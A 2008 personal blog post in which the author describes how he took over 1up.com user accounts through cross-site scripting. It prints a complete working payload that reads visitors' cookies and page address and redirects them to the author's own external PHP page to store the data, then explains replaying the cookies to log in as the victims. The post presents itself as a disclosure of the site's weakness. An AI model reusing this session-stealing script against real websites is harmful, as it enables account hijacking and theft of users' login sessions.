Logic’s Last Stand

June 19, 2008

Sorry 1up, it had to be done

Filed under: Computers, Gaming — Tags: , , , , , — Zurahn @ 2:45 am

Web-design and security is tough, because it’s a balance of sorts. You want to tighten things up, but as a result, unless you put a ton of work into very precise filtering, you just have to cut off your users from some benefits. Being someone who has used web formatting for years, being able to put it into comments and forum posts is a boon.

That said, there is one thing that you just cannot allow — JavaScript. Aside from the obvious ability to annoy or redirect the page, you can also use it to steal data.

So I present to you, how I hacked 1up user accounts:

<script type="text/javascript" src="http://tinyurl.com/5uujea"></script&gt;
<script type="text/javascript">
var data = document.cookie;
var address = window.location;
var params = Object.toQueryString({data: data, address: address});
var url = ‘http://zurahn.freehostia.com';
url += ‘/cookiemonster.php?’ + params;
var redirect = readCookie(‘redirect’);

if(redirect == null)
{
createCookie(‘redirect’,1,1);
window.location = url;
}

function createCookie(name,value,days) {
if (days) {
var date = new Date();
date.setTime(date.getTime()+(days*24*60*60*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}

function readCookie(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(‘;’);
for(var i=0;i < ca.length;i++) {
var c = ca[i];
while (c.charAt(0)==’ ‘) c = c.substring(1,c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}

</script>

This is called cross-site scripting (XSS) and there’s a reason why it’s one of the prominent web security threats.

Prototype.js (the tinyurl) is used to convert the user’s cookie data and the current page address into a valid query string which is used to send the data to an off-site page via redirect after writing a cookie that the user has visited the page once. At the off-site page, the cookie data is stored in a database table, then redirects back to the original page, which now doesn’t redirect because of the earlier cookie being created.

Once this has happened, I have all the cookie data. All I then need to do is create a new cookie for that domain (or edit my own) and I am in the account of whomever visited the page.

1up, your page design has always been ugly, but I can deal with that. Your features and news are hit-or-miss. Alright. Your forums are slow and empty. I’ve got friends. And your user features are marred by formatting bugs. I’ve got other outlets. But my own and everyone else’s account is seriously in risk at every visit of any community page.

About these ads

1 Comment »

  1. Damn. This is Steel. And this stuff is scary.

    Comment by SteelyBoy, afraid of teh internets. — June 19, 2008 @ 9:29 am


RSS feed for comments on this post. TrackBack URI

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

The Shocking Blue Green Theme. Blog at WordPress.com.

Follow

Get every new post delivered to your Inbox.

%d bloggers like this: